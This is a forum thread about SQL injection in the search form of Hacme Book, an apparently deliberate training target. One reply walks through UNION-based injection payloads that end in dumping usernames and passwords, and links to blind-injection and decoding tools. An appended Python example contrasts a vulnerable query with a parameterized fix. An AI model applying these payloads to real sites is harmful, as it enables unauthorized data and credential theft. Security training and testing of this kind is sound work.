Government Security
Network Security Resources

Need Help With Sql Injection In "search" Form

#1 virgoman (Private First Class, Members, 47 posts)

Posted 11 December 2007 - 07:28 PM

Hi All,

I'm working on Foundstone's Hacme Book. I wanted to know about the database entries through the Search form. I tried, but it doesn't work.

Can anybody guide me with the procedure for SQL injection with Search form...?


Virgoman........!!!!!!

#2 jacco (Private First Class, Members, 58 posts)

Posted 12 December 2007 - 06:47 AM

Try:
hxxp://www.testsite.com/search.php?q=test' and 1=1 --

Then try:
hxxp://www.testsite.com/search.php?q=test' and 1=2 --

If the first query gives results and the second one says "no results found", the search form could be vulnerable to SQL-injection.

To find out how many columns the select query returns, try:
hxxp://www.testsite.com/search.php?q=test' or 1=1 ORDER BY 1 --
If no error, the select query returns at least 1 column.

Try:
hxxp://www.testsite.com/search.php?q=test' or 1=1 ORDER BY 2 --
If no error, the select query returns at least 2 columns,
and so on until you get an error.

If you know how many columns the select query returns, you can try to find out which column is shown where in the search result overview by trying this query
(for example, when the search query returns 3 columns):

hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1','2','3' --

Now you need to find out if some interesting table exists by trying:
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1','2','3' FROM user --
or:
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1','2','3' FROM users --
or:
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1','2','3' FROM session --
Also try some changes in lower and upper case, and try some prefixes like cms_ or websitename_.
For example:
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1','2','3' FROM cms_User --

If you found a table that exists, you can try guessing column names like this:
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1',username,'3' FROM cms_User where 1=1 --
or:
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1',password,'3' FROM cms_User where 1=1 --

If you figured out the table names and column names, you could make a query like:
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1',loginname,password FROM cms_User where 1=1 --
This select query will return all users with their passwords.


If it is a POST form instead of a GET form, remove "hxxp://www.testsite.com/search.php?q=" from all example lines and paste the rest of the example line in the search input box.
If it doesn't work, try all the above while replacing all single quotes with double quotes.
If it's blind SQL-injection, try using mysqlbf, mysqllst and mysqlget. Download them here: hxxp://www.reversing.org/node/view/11
If passwords are encoded, try decoding them with this POC: hxxp://www.sqlhack.com/poc.c


Good luck!!

Greetingz,
Jacco
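The true/false pair and the three-column UNION probe from the reply above, run against a search query built by string concatenation and against its parameterized fix. This is an added example (Python with an in-memory SQLite table), not code from Hacme Book or from the thread; the books table, its columns and the sample rows are assumptions made up for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed in-memory catalogue standing in for the book database
    # behind the search form (assumed schema and sample rows).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (id INTEGER, title TEXT, author TEXT)")
    conn.executemany("INSERT INTO books VALUES (?, ?, ?)", [
        (1, "unit test", "Beck"),
        (2, "SQL primer", "Smith"),
        (3, "web app hardening", "Jones"),
    ])
    return conn


def search_vulnerable(conn, q: str) -> list:
    # The flaw the post relies on: q is spliced into the SQL text, so a
    # quote in q closes the literal and the rest of q is executed as SQL.
    sql = f"SELECT id, title, author FROM books WHERE title LIKE '%{q}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, q: str) -> list:
    # The fix: q is bound as a parameter, so the driver hands it to the
    # engine as data; quotes, comments and UNION inside it never become SQL.
    sql = "SELECT id, title, author FROM books WHERE title LIKE '%' || ? || '%'"
    return conn.execute(sql, (q,)).fetchall()


def probe_differs(conn, search) -> bool:
    # The confirmation step from the reply, reused as a regression check
    # after the fix: a true/false pair must give the same rows once q is bound.
    true_rows = search(conn, "test' and 1=1 --")
    false_rows = search(conn, "test' and 1=2 --")
    return true_rows != false_rows


if __name__ == "__main__":
    db = make_db()
    union = "test' AND 1=2 UNION SELECT '1','2','3' --"
    print("vulnerable differs:", probe_differs(db, search_vulnerable))  # True
    print("vulnerable union  :", search_vulnerable(db, union))          # [('1', '2', '3')]
    print("fixed differs     :", probe_differs(db, search_safe))        # False
    print("fixed union       :", search_safe(db, union))                # []
```

The same check works against any handler that takes a search term and returns rows: if the two probes disagree, the term is still reaching the engine as SQL.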
